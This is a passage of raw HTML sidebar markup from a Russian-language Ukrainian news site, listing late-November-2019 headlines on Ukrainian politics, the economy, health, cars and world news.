padding: 0 9px;">Топ-новости &nbsp;&nbsp;<i style="font-size: 11px;color: #666;font-style: normal;text-transform: none;">за 24 часа</i></span></a></p><ul id="slider"><li><ul class="tact"><li id="li0" style="width:210px;"><a href="https://enovosty.com/news_economy/full/2611-uzhe-skoro-ofshory-mogut-polnostyu-ischeznut" title="Уже скоро офшоры могут полностью исчезнуть"><img width="210" height="156" alt="Уже скоро офшоры могут полностью исчезнуть" src="https://enovosty.com/wp-content/uploads/2019/11/off.jpg"></a><a href="https://enovosty.com/news_economy/full/2611-uzhe-skoro-ofshory-mogut-polnostyu-ischeznut" title="Уже скоро офшоры могут полностью исчезнуть" class="name">Уже скоро офшоры могут полностью исчезнуть <span>(1524)</span></a></li></ul></li><li><ul class="tact"><li id="li1" style="width:210px;"><a href="https://enovosty.com/news_economy/full/2611-evroblyaxerov-nachali-shtrafovat-po-polnoj" title="Евробляхеров начали штрафовать по-полной"><img width="210" height="156" alt="Евробляхеров начали штрафовать по-полной" src="https://enovosty.com/wp-content/uploads/2019/11/blyaha.jpg"></a><a href="https://enovosty.com/news_economy/full/2611-evroblyaxerov-nachali-shtrafovat-po-polnoj" title="Евробляхеров начали штрафовать по-полной" class="name">Евробляхеров начали штрафовать по-полной <span>(4924)</span></a></li></ul></li><li><ul class="tact"><li id="li2" style="width:210px;"><a href="https://enovosty.com/news_kiev/full/2611-rezinovyj-kiev-gosstat-nazval-kolichestvo-prozhivayushhix-v-stolice-lyudej" title="Резиновый Киев: Госстат назвал количество проживающих в столице людей"><img width="210" height="156" alt="Резиновый Киев: Госстат назвал количество проживающих в столице людей" src="https://enovosty.com/wp-content/uploads/2019/11/megamarsh-vyshivanok-v-kieve_rect_cb6c65b820cc3829b95a799fa67a9455-e1574707335810.jpeg"></a><a href="https://enovosty.com/news_kiev/full/2611-rezinovyj-kiev-gosstat-nazval-kolichestvo-prozhivayushhix-v-stolice-lyudej" title="Резиновый Киев: Госстат назвал количество проживающих в столице людей" class="name">"Резиновый" Киев: Госстат назвал количество проживающих в столице людей <span>(4968)</span></a></li></ul></li><li><ul class="tact"><li id="li3" style="width:210px;"><a href="https://enovosty.com/news_society/full/2511-v-ukraine-povysyat-tarify-na-elektroenergiyu-nazvana-prichina" title="В Украине повысят тарифы на электроэнергию: названа причина"><img width="210" height="156" alt="В Украине повысят тарифы на электроэнергию: названа причина" src="https://enovosty.com/wp-content/uploads/2019/11/729_486_5d198b43d8100.jpg"></a><a href="https://enovosty.com/news_society/full/2511-v-ukraine-povysyat-tarify-na-elektroenergiyu-nazvana-prichina" title="В Украине повысят тарифы на электроэнергию: названа причина" class="name">В Украине повысят тарифы на электроэнергию: названа причина <span>(687)</span></a></li></ul></li><li><ul class="tact"><li id="li4" style="width:210px;"><a href="https://enovosty.com/news_society/full/2511-moodys-podnyalo-ukrainu-v-vazhnom-ekonomichnom-rejtinge" title="Moody's подняло Украину в важном экономичном рейтинге"><img width="210" height="156" alt="Moody's подняло Украину в важном экономичном рейтинге" src="https://enovosty.com/wp-content/uploads/2019/11/99639-1_large.jpg"></a><a href="https://enovosty.com/news_society/full/2511-moodys-podnyalo-ukrainu-v-vazhnom-ekonomichnom-rejtinge" title="Moody's подняло Украину в важном экономичном рейтинге" class="name">Moody's подняло Украину в важном экономичном рейтинге <span>(258)</span></a></li></ul></li><li><ul class="tact"><li id="li5" style="width:210px;"><a href="https://enovosty.com/news_society/full/2511-v-ukraine-nachato-serijnoe-proizvodstvo-vintovki-snipex-t-rex-zloj-odessit" title="В Украине начато серийное производство винтовки SNIPEX T-REX, - Злой Одессит"><img width="210" height="156" alt="В Украине начато серийное производство винтовки SNIPEX T-REX, - Злой Одессит" src="https://enovosty.com/wp-content/uploads/2019/11/2871151_900.jpg"></a><a href="https://enovosty.com/news_society/full/2511-v-ukraine-nachato-serijnoe-proizvodstvo-vintovki-snipex-t-rex-zloj-odessit" title="В Украине начато серийное производство винтовки SNIPEX T-REX, - Злой Одессит" class="name">В Украине начато серийное производство винтовки SNIPEX T-REX, - Злой Одессит <span>(1913)</span></a></li></ul></li><li><ul class="tact"><li id="li6" style="width:210px;"><a href="https://enovosty.com/news_economy/full/2511-orzhel-soobshhil-o-rekordnyx-zapasax-uglya-na-ukrainskix-tes" title="Оржель сообщил о рекордных запасах угля на украинских ТЭС"><img width="210" height="156" alt="Оржель сообщил о рекордных запасах угля на украинских ТЭС" src="https://enovosty.com/wp-content/uploads/2019/11/ugol.jpg"></a><a href="https://enovosty.com/news_economy/full/2511-orzhel-soobshhil-o-rekordnyx-zapasax-uglya-na-ukrainskix-tes" title="Оржель сообщил о рекордных запасах угля на украинских ТЭС" class="name">Оржель сообщил о рекордных запасах угля на украинских ТЭС <span>(192)</span></a></li></ul></li><li><ul class="tact"><li id="li7" style="width:210px;"><a href="https://enovosty.com/news_society/full/2511-iz-shkolnoj-programmy-uberut-proizvedeniya-o-stradaniyax-ukrainskogo-naroda-ministr" title="Из школьной программы уберут произведения о страданиях украинского народа - министр"><img width="210" height="156" alt="Из школьной программы уберут произведения о страданиях украинского народа - министр" src="https://enovosty.com/wp-content/uploads/2019/11/katerina.jpg"></a><a href="https://enovosty.com/news_society/full/2511-iz-shkolnoj-programmy-uberut-proizvedeniya-o-stradaniyax-ukrainskogo-naroda-ministr" title="Из школьной программы уберут произведения о страданиях украинского народа - министр" class="name">Из школьной программы уберут произведения о страданиях украинского народа - министр <span>(4267)</span></a></li></ul></li><li><ul class="tact"><li id="li8" style="width:210px;"><a href="https://enovosty.com/news-auto/full/2511-stalo-izvestno-kogda-v-ukraine-zarabotayut-cifrovye-voditelskie-prava" title="Стало известно, когда в Украине заработают цифровые водительские права"><img width="210" height="156" alt="Стало известно, когда в Украине заработают цифровые водительские права" src="https://enovosty.com/wp-content/uploads/2019/11/2401276-e1574675054317.jpeg"></a><a href="https://enovosty.com/news-auto/full/2511-stalo-izvestno-kogda-v-ukraine-zarabotayut-cifrovye-voditelskie-prava" title="Стало известно, когда в Украине заработают цифровые водительские права" class="name">Стало известно, когда в Украине заработают цифровые водительские права <span>(698)</span></a></li></ul></li><li><ul class="tact"><li id="li9" style="width:210px;"><a href="https://enovosty.com/news_politics/full/2511-advokat-raskryl-xitrost-rf-v-dele-o-peredache-ukrainskix-korablej" title="Адвокат раскрыл хитрость РФ в деле о передаче украинских кораблей"><img width="210" height="156" alt="Адвокат раскрыл хитрость РФ в деле о передаче украинских кораблей" src="https://enovosty.com/wp-content/uploads/2019/11/image-8.jpg"></a><a href="https://enovosty.com/news_politics/full/2511-advokat-raskryl-xitrost-rf-v-dele-o-peredache-ukrainskix-korablej" title="Адвокат раскрыл хитрость РФ в деле о передаче украинских кораблей" class="name">Адвокат раскрыл хитрость РФ в деле о передаче украинских кораблей <span>(2305)</span></a></li></ul></li><li><ul class="tact"><li id="li10" style="width:210px;"><a href="https://enovosty.com/news-finance/full/2511-ekspert-rasskazal-kogda-upadyot-dollar" title="Эксперт рассказал, когда упадёт доллар"><img width="210" height="156" alt="Эксперт рассказал, когда упадёт доллар" src="https://enovosty.com/wp-content/uploads/2019/11/dollar.jpg"></a><a href="https://enovosty.com/news-finance/full/2511-ekspert-rasskazal-kogda-upadyot-dollar" title="Эксперт рассказал, когда упадёт доллар" class="name">Эксперт рассказал, когда упадёт доллар <span>(1124)</span></a></li></ul></li><li><ul class="tact"><li id="li11" style="width:210px;"><a href="https://enovosty.com/news_politics/full/2511-ministr-rassekretil-plan-vozvrashheniya-zhitelej-donbassa" title="Министр рассекретил план возвращения жителей Донбасса"><img width="210" height="156" alt="Министр рассекретил план возвращения жителей Донбасса" src="https://enovosty.com/wp-content/uploads/2019/11/borodyan.jpg"></a><a href="https://enovosty.com/news_politics/full/2511-ministr-rassekretil-plan-vozvrashheniya-zhitelej-donbassa" title="Министр рассекретил план возвращения жителей Донбасса" class="name">Министр рассекретил план возвращения жителей Донбасса <span>(1048)</span></a></li></ul></li><li><ul class="tact"><li id="li12" style="width:210px;"><a href="https://enovosty.com/news_technology/full/2511-kompaniya-boeing-predstavila-krupnejshij-variant-samoleta-737-max" title="Компания Boeing представила крупнейший вариант самолета 737 MAX"><img width="210" height="156" alt="Компания Boeing представила крупнейший вариант самолета 737 MAX" src="https://enovosty.com/wp-content/uploads/2019/11/958f15fb36f42ee4b759404134a102dd_fitted_800x3000-e1574614791955.jpeg"></a><a href="https://enovosty.com/news_technology/full/2511-kompaniya-boeing-predstavila-krupnejshij-variant-samoleta-737-max" title="Компания Boeing представила крупнейший вариант самолета 737 MAX" class="name">Компания Boeing представила крупнейший вариант самолета 737 MAX <span>(660)</span></a></li></ul></li></ul></div><div class="wiget simple_pr"><div class="caption"><p style=" text-transform: uppercase; font-weight: 700; font-family: arial,verdana,tahoma; margin: 0; display: block; float: left; color: #fff; padding: 0 5px 0 4px; background-color: #f93; height: 17px; font-size: 12px;
"><a style="color: #fff;" href="https://enovosty.com/photo-nedeli">Фото недели</a></p></div><div class="blogTitle"><p style="font-size:8pt;"><a href="https://enovosty.com/photo-nedeli/full/photo-gallery?album=1&gallery=525&pid=11610" rel="bookmark">Ситуации, когда природа ворвалась в цивилизацию</a></p><div style="text-align:center;"><a href="https://enovosty.com/photo-nedeli/full/photo-gallery?album=1&gallery=525&pid=11610" rel="bookmark"> <img alt="Фото недели" src="https://enovosty.com/wp-content/gallery/vorvalis/thumbs/thumbs_naturewins11.jpg"></a></div></div> <div class="cls"></div> <a href="https://enovosty.com/photo-nedeli" class="readMore">Все фото &raquo;</a></div><div class="wiget simple_line" style="border-color:#D6E5F2;"><div class="caption" style=""><p style="font-size: 12px; height: 17px; color: #fff; background-color: #346796; padding: 0 5px; display: inline; text-transform: uppercase; font-weight: 700;font-family: arial,verdana,tahoma;">Здоровье</p></div><div class='cls'></div><span class='news_date'>26.11.2019 г.</span><br /><div class="post_news"><span id="post-4783776"><span class="postDate">14:50</span><a class="postTitle" href="https://enovosty.com/zdorove/full/2611-yaponcy-sozdali-test-pozvolyayushhij-opredelit-13-vidov-raka-po-odnoj-kaple-krovi">Японцы создали тест, позволяющий определить 13 видов рака по одной капле крови</a><br /><div class="postFields"></div></span></div><div class="cls"></div><hr /><div class="cls"></div><div class='cls'></div><span class='news_date'>25.11.2019 г.</span><br /><div class="post_news"><span id="post-4783724"><span class="postDate">23:28</span><a class="postTitle" href="https://enovosty.com/zdorove/full/2511-polchishha-klopov-atakuyut-mir-shokiruyushhaya-statistika">Полчища клопов атакуют мир: шокирующая статистика</a><br /><div class="postFields"></div></span></div><div class="post_news"><span id="post-4783588"><span class="postDate">09:18</span><a class="postTitle" href="https://enovosty.com/zdorove/full/2511-uchyonye-obnaruzhili-opasnost-soevyx-produktov-kolichestvo-fitoestrogenov-prevyshaet-normu">Учёные обнаружили опасность соевых продуктов: количество фитоэстрогенов превышает норму</a><br /><div class="postFields"></div></span></div><div class="cls"></div><hr /><div class="cls"></div><div class='cls'></div><span class='news_date'>24.11.2019 г.</span><br /><div class="post_news"><span id="post-4783574"><span class="postDate">23:57</span><a class="postTitle" href="https://enovosty.com/zdorove/full/2411-80-podrostkov-vedut-malopodvizhnyj-obraz-zhizni-voz">80% подростков ведут малоподвижный образ жизни – ВОЗ</a><br /><div class="postFields"></div></span></div><div class="post_news"><span id="post-4783513"><span class="postDate">08:55</span><a class="postTitle" href="https://enovosty.com/zdorove/full/2411-desyat-produktov-sposobnyx-zamenit-lekarstva">Десять продуктов, способных заменить лекарства</a><br /><div class="postFields"></div></span></div><div class="post_news"><span id="post-4783504"><span class="postDate">07:50</span><a class="postTitle" href="https://enovosty.com/zdorove/full/2411-uchyonye-nazvali-prichinu-prezhdevremennogo-stareniya-mozga">Учёные назвали причину преждевременного старения мозга</a><br /><div class="postFields"></div></span></div><div class="cls"></div><hr /><div class="cls"></div><div class='cls'></div><span class='news_date'>23.11.2019 г.</span><br /><div class="post_news"><span id="post-4783473"><span class="postDate">19:00</span><a class="postTitle" href="https://enovosty.com/zdorove/full/2311-pora-bit-trevogu-onkolog-nazval-opasnyj-simptom-strashnoj-bolezni">Пора бить тревогу: Онколог назвал опасный симптом страшной болезни</a><br /><div class="postFields"></div></span></div><div class="cls"></div><a class="readMore" href="https://enovosty.com/news/zdorove">Все здоровье</a></div><div class="wiget simple_line analitika"> <div class="caption"><p style="text-transform: uppercase;
margin: 0;
padding: 0;
text-align: left;
font-size: 12px;
font-weight: 700;
font-family: arial,verdana,tahoma;"><a href="https://enovosty.com/articles">Аналитика</a></p></div><div class="block"><div class="info"><span class="postDate">25.11.2019</span></div><p style="margin-bottom: 3px;
margin: 0;
padding: 0;
text-align: left;
font-size: 12px;
font-weight: 700;
font-family: arial,verdana,tahoma;
"><a class="postTitle" href="https://enovosty.com/politika/full/2511-itogi-dnya-i-istiraya-cel-krymskogo-mosta">Итоги дня: Смена настроений в Украине, удар по Пекину и истинная цель Крымского моста</a></p><div class="cblock"><a href="https://enovosty.com/politika/full/2511-itogi-dnya-i-istiraya-cel-krymskogo-mosta"><img width="230" alt="Итоги дня: Смена настроений в Украине, удар по Пекину и истинная цель Крымского моста" src="/wp-content/uploads/2019/11/soc-cropped-e1574695721972.jpg"></a></div><span class="postExcerpt"><a href="https://enovosty.com/politika/full/2511-itogi-dnya-i-istiraya-cel-krymskogo-mosta">На местных выборах в Гонконге побеждает оппозиция, настроение украинцев резко изменились, а суд принял циничное решение по делу активистка Екатерины ...</a></span></div><div class="block"><div class="info"><span class="postDate">25.11.2019</span></div><p style="margin-bottom: 3px;
margin: 0;
padding: 0;
text-align: left;
font-size: 12px;
font-weight: 700;
font-family: arial,verdana,tahoma;
"><a class="postTitle" href="https://enovosty.com/ekonomika/full/2511-prozrachnyj-rynok-zemli-prostimuliruet-ukrainskuyu-ekonomiku-prognoz-vsemirnogo-banka">Прозрачный рынок земли простимулирует украинскую экономику – прогноз Всемирного банка</a></p><div class="cblock"><a href="https://enovosty.com/ekonomika/full/2511-prozrachnyj-rynok-zemli-prostimuliruet-ukrainskuyu-ekonomiku-prognoz-vsemirnogo-banka"><img width="230" alt="Прозрачный рынок земли простимулирует украинскую экономику – прогноз Всемирного банка" src="/wp-content/uploads/2019/11/soc_1000905.jpg"></a></div><span class="postExcerpt"><a href="https://enovosty.com/ekonomika/full/2511-prozrachnyj-rynok-zemli-prostimuliruet-ukrainskuyu-ekonomiku-prognoz-vsemirnogo-banka">Создание прозрачного и эффективного рынка земли, поможет ускорить рост экономики и повысить уровень жизни украинцев. Такие выводы содержаться в новом ...</a></span></div><div class="block"><div class="info"><span class="postDate">22.11.2019</span></div><p style="margin-bottom: 3px;
margin: 0;
padding: 0;
text-align: left;
font-size: 12px;
font-weight: 700;
font-family: arial,verdana,tahoma;
"><a class="postTitle" href="https://enovosty.com/politika/full/2211-kak-i-zachem-ze-vlast-namerena-dushit-svobodu-slova">Как и зачем Зе-власть намерена душить свободу слова</a></p><div class="cblock"><a href="https://enovosty.com/politika/full/2211-kak-i-zachem-ze-vlast-namerena-dushit-svobodu-slova"><img width="230" alt="Как и зачем Зе-власть намерена душить свободу слова" src="/wp-content/uploads/2019/11/cover.jpg"></a></div><span class="postExcerpt"><a href="https://enovosty.com/politika/full/2211-kak-i-zachem-ze-vlast-namerena-dushit-svobodu-slova">Ответ на вопрос о том, почему новоявленная власть срочно вознамерилась взять к ногтю медиа, очевиден. За неполных полгода Зе-команда и фракция «слуг ...</a></span></div></div><div class="wiget simple_line" style="border-color:#D6E5F2;"><div class="caption"><p style="font-weight: 700; font-family: arial,verdana,tahoma; font-size: 12px; text-transform: uppercase; margin: 0; padding: 0; text-align: left;height: 17px;"><a href="https://enovosty.com/news/">Последние новости</a></p></div><div class='cls'></div><span class='news_date'>26.11.2019 г.</span><br /><div class="post_news"> <span id="post-4783818"> <span class="postDate">16:59</span> <a class="postTitle" href="https://enovosty.com/news-culture/full/2611-arxeologi-nashli-drevnejshuyu-shaxmatnuyu-figuru">Археологи нашли древнейшую шахматную фигуру</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4783825"> <span class="postDate">16:57</span> <a class="postTitle" href="https://enovosty.com/news_society/full/2611-v-ukraine-krupnye-i-srednie-predpriyatiya-uvelichili-pribyl-vdvoe">В Украине крупные и средние предприятия увеличили прибыль вдвое</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4783820"> <span class="postDate">16:34</span> <a class="postTitle" href="https://enovosty.com/news_society/full/2611-v-krym-pereselili-uzhe-polmilliona-rossiyan">В Крым переселили уже полмиллиона россиян</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4783810"> <span class="postDate">16:20</span> <a class="postTitle" href="https://enovosty.com/news_technology/full/2611-amerikanskaya-policiya-protestirovala-robota-psa-ot-boston-dynamics">Американская полиция протестировала робота-пса от Boston Dynamics</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4783812"> <span class="postDate">16:04</span> <a class="postTitle" href="https://enovosty.com/news_society/full/2611-sencovu-vruchili-prestizhnuyu-premiyu-v-evroparlamente-video">Сенцову вручили престижную премию в Европарламенте: видео мощного выступления</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4783805"> <span class="postDate">15:54</span> <a class="postTitle" href="https://enovosty.com/news_society/full/2611-v-minfine-soobshhili-o-sokrashhenii-gosdolga">В Минфине сообщили о сокращении госдолга</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4783790"> <span class="postDate">15:45</span> <a class="postTitle" href="https://enovosty.com/news-culture/full/2611-iskusstvennyj-intellekt-pisat-pesy-shekspiru-pomogal-soavtor">Искусственный интеллект: Писать пьесы Шекспиру помогал соавтор</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4783802"> <span class="postDate">15:34</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/2611-toplivnaya-intervenciya-kremlya-v-zimbabve-ili-legalizaciya-almazov-chvk-vagner-zloj-odessit">Топливная интервенция Кремля в Зимбабве или легализация алмазов ЧВК "Вагнер", - Злой Одессит</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4783799"> <span class="postDate">15:13</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/2611-associated-press-v-klimaticheskoj-vojne-neobxodimy-bystrye-pobedy">Associated Press: В климатической войне необходимы «быстрые победы»</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4783796"> <span class="postDate">15:08</span> <a class="postTitle" href="https://enovosty.com/news-markets/full/2611-energoatom-trebuet-ot-amku-rassledovat-manipulyacii-importerov-elektroenergii-iz-rossii-dokument">«Энергоатом» требует от АМКУ расследовать манипуляции импортеров электроэнергии из России (документ)</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4783782"> <span class="postDate">15:00</span> <a class="postTitle" href="https://enovosty.com/news_society/full/2611-domashnyaya-belka-spasennaya-iz-uragana-7-let-nazad-stala-zvezdoj-instagram-video">Домашняя белка, спасенная из урагана 7 лет назад, стала звездой Instagram (ВИДЕО)</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4783776"> <span class="postDate">14:50</span> <a class="postTitle" href="https://enovosty.com/zdorove/full/2611-yaponcy-sozdali-test-pozvolyayushhij-opredelit-13-vidov-raka-po-odnoj-kaple-krovi">Японцы создали тест, позволяющий определить 13 видов рака по одной капле крови</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4783777"> <span class="postDate">14:40</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/2611-v-kitae-na-odin-iz-domov-upal-otvalivshijsya-ot-rakety-bokovoj-uskoritel-video">В Китае на один из домов упал отвалившийся от ракеты боковой ускоритель (ВИДЕО)</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4783792"> <span class="postDate">14:26</span> <a class="postTitle" href="https://enovosty.com/news_kiev/full/2611-dom-monstr-na-podole-yarchajshij-primer-stroitelnogo-bespredela-sovetnik-mera">Дом-монстр на Подоле ярчайший пример строительного беспредела, - советник мэра</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4783769"> <span class="postDate">14:20</span> <a class="postTitle" href="https://enovosty.com/news-finance/full/2611-v-ukraine-sobirayutsya-obnovit-dizajn-neskolkix-kupyur-kak-budut-vyglyadet-novinki-foto">В Украине собираются обновить дизайн нескольких купюр: как будут выглядеть новинки (ФОТО)</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4783739"> <span class="postDate">14:00</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/2611-glotok-svezhego-vozduxa-kak-tri-zabroshennyx-promyshlennyx-rajona-stali-krasivymi-parkami-foto">Глоток свежего воздуха: как три заброшенных промышленных района стали красивыми парками (ФОТО)</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4783773"> <span class="postDate">14:00</span> <a class="postTitle" href="https://enovosty.com/news_society/full/2611-26-noyabrya-sostoitsya-novolunie-chto-mozhno-i-nelzya-delat-v-etot-den">26 ноября состоится новолуние: что можно и нельзя делать в этот день</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4783767"> <span class="postDate">13:40</span> <a class="postTitle" href="https://enovosty.com/news-auto/full/2611-voditelyu-na-zametku-chto-delat-esli-istek-srok-dvuxletnego-voditelskogo-udostovereniya">Водителю на заметку: что делать, если истек срок двухлетнего водительского удостоверения</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4783783"> <span class="postDate">13:22</span> <a class="postTitle" href="https://enovosty.com/news-markets/full/2611-prinuditelnyx-retrospektivnyx-izmenenij-zelenyx-tarifov-ne-budet-minenergo">Принудительных ретроспективных изменений "зеленых" тарифов не будет, - Минэнерго</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4783762"> <span class="postDate">13:20</span> <a class="postTitle" href="https://enovosty.com/news_society/full/2611-popolnenie-v-korolevskoj-seme-kejt-middlton-zapodozrili-v-beremennosti">Пополнение в королевской семье: Кейт Миддлтон заподозрили в беременности</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4783764"> <span class="postDate">13:05</span> <a class="postTitle" href="https://enovosty.com/news_society/full/2611-segodnya-pravoslavnye-chtyat-pamyat-ioanna-zlatousta-istoriya-i-tradicii-prazdnika">Сегодня православные чтят память Иоанна Златоуста: история и традиции праздника</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4783759"> <span class="postDate">13:00</span> <a class="postTitle" href="https://enovosty.com/news_technology/full/2611-pentagon-izuchaet-vozmozhnost-razmeshheniya-bpla-pod-vodoj">Пентагон изучает возможность размещения БПЛА под водой</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4783754"> <span class="postDate">12:45</span> <a class="postTitle" href="https://enovosty.com/news-auto/full/2611-v-ukrainu-postupaet-vse-bolshe-b-u-avtomobilej-no-vopros-s-evroblyaxami-do-six-por-ne-reshen">В Украину поступает все больше б/у автомобилей, но вопрос с "евробляхами" до сих пор не решен</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4783758"> <span class="postDate">12:34</span> <a class="postTitle" href="https://enovosty.com/news_society/full/2611-obnarodovany-daty-probnogo-vno-v-2020-godu">Обнародованы даты пробного ВНО в 2020 году</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4783766"> <span class="postDate">12:31</span> <a class="postTitle" href="https://enovosty.com/news_economy/full/2611-uzhe-skoro-ofshory-mogut-polnostyu-ischeznut">Уже скоро офшоры могут полностью исчезнуть</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4783751"> <span class="postDate">12:30</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/2611-v-albanii-proizoshlo-silnejshee-zemletryasenie-mnogo-postradavshix-foto">В Албании произошло сильнейшее землетрясение, много пострадавших (ФОТО)</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4783765"> <span class="postDate">12:29</span> <a class="postTitle" href="https://enovosty.com/news_economy/full/2611-stalo-izvestno-kogda-v-ukraine-poyavyatsya-platnye-dorogi">Стало известно, когда в Украине появятся платные дороги</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4783735"> <span class="postDate">12:15</span> <a class="postTitle" href="https://enovosty.com/news-culture/full/2611-coldplay-na-neskolko-let-perestanut-gastrolirovat-chtoby-spasti-mir">Coldplay на несколько лет перестанут гастролировать, чтобы спасти мир</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4783744"> <span class="postDate">12:15</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/2611-kitayanka-pronikshaya-na-territoriyu-rezidencii-prezidenta-ssha-donalda-trampa-poluchila-vosem-mesyacev-tyurmy">Китаянка, проникшая на территорию резиденции президента США Дональда Трампа, получила восемь месяцев тюрьмы</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4783747"> <span class="postDate">12:00</span> <a class="postTitle" href="https://enovosty.com/news_kiev/full/2611-v-kieve-v-ramkax-mezhdunarodnoj-socialnoj-akcii-oranzhevym-cvetom-podsvetili-parkovyj-most-foto">В Киеве в рамках Международной социальной акции оранжевым цветом подсветили Парковый мост (ФОТО)</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4783745"> <span class="postDate">11:55</span> <a class="postTitle" href="https://enovosty.com/news_society/full/2611-sinoptiki-v-ukraine-ozhidaetsya-xolodnaya-i-tumannaya-pogoda">Синоптики: В Украине ожидается холодная и туманная погода</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4783748"> <span class="postDate">11:48</span> <a class="postTitle" href="https://enovosty.com/news_society/full/2611-bespredel-nochyu-sozhgli-avtomobil-glavnogo-odesskogo-tamozhennika-foto">Беспредел: ночью сожгли автомобиль главного Одесского таможенника (ФОТО)</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4783746"> <span class="postDate">11:40</span> <a class="postTitle" href="https://enovosty.com/news_incidents/full/2611-detektivy-nabu-provodyat-obysk-v-dome-zamestitelya-nachalnika-kievskoj-tamozhni">Детективы НАБУ проводят обыск в доме заместителя начальника Киевской таможни</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4783743"> <span class="postDate">11:14</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/2611-polsha-vernula-iz-anglii-100-tonn-zolota">Польша вернула из Англии 100 тонн золота</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4783738"> <span class="postDate">10:14</span> <a class="postTitle" href="https://enovosty.com/news_economy/full/2611-prezedent-zelenskij-srochno-obratilsya-k-kabminu-iz-za-zarplat">Презедент Зеленский срочно обратился к Кабмину из-за зарплат</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4783734"> <span class="postDate">09:08</span> <a class="postTitle" href="https://enovosty.com/news_economy/full/2611-evroblyaxerov-nachali-shtrafovat-po-polnoj">Евробляхеров начали штрафовать по-полной</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4783733"> <span class="postDate">09:06</span> <a class="postTitle" href="https://enovosty.com/news_politics/full/2611-boeviki-ustroili-krovavuyu-raspravu-na-donbasse">Боевики устроили кровавую расправу на Донбассе</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4783732"> <span class="postDate">09:04</span> <a class="postTitle" href="https://enovosty.com/news_politics/full/2611-pochemu-rada-ne-prinyala-popravku-dlya-rassledovaniya-del-majdana">Почему Рада не приняла поправку для расследования дел Майдана</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4783700"> <span class="postDate">07:50</span> <a class="postTitle" href="https://enovosty.com/news-auto/full/2611-ukrainskim-voditelyam-napomnili-o-shtrafax-za-kolesa-kak-ne-popast-na-dengi">Украинским водителям напомнили о штрафах за колеса: как не попасть на деньги</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4783709"> <span class="postDate">07:40</span> <a class="postTitle" href="https://enovosty.com/news_society/full/2611-v-ukraine-startovala-akciya-16-dnej-aktivizma-protiv-nasiliya-v-chem-sut">В Украине стартовала акция «16 дней активизма против насилия»: в чем суть</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4783705"> <span class="postDate">07:30</span> <a class="postTitle" href="https://enovosty.com/news_technology/full/2611-yuzhnaya-koreya-osnastit-istrebitel-kf-x-raketoj-meteor">Южная Корея оснастит истребитель KF-X ракетой Meteor</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4783702"> <span class="postDate">07:15</span> <a class="postTitle" href="https://enovosty.com/news_kiev/full/2611-rezinovyj-kiev-gosstat-nazval-kolichestvo-prozhivayushhix-v-stolice-lyudej">"Резиновый" Киев: Госстат назвал количество проживающих в столице людей</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4783694"> <span class="postDate">07:00</span> <a class="postTitle" href="https://enovosty.com/news-auto/full/2611-ukraincam-napomnili-o-deklarirovanii-avtomobilya-chto-neobxodimo-znat">Украинцам напомнили о декларировании автомобиля: что необходимо знать</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4783731"> <span class="postDate">00:23</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/2611-obnarodovany-sekretnye-dokumenty-vlastej-kitaya-otnositelno-prinuditelnyx-lagerej-dlya-musulman">Обнародованы секретные документы властей Китая относительно принудительных лагерей для мусульман</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4783729"> <span class="postDate">00:01</span> <a class="postTitle" href="https://enovosty.com/news-auto/full/2611-pervye-platnye-dorogi-v-ukraine-mogut-poyavitsya-cherez-3-4-goda-glava-ukravtodor">Первые платные дороги в Украине могут появиться через 3-4 года - глава Укравтодор</a><br /> </span><div class="postFields"></div></div><div class="cls"></div><hr /><div 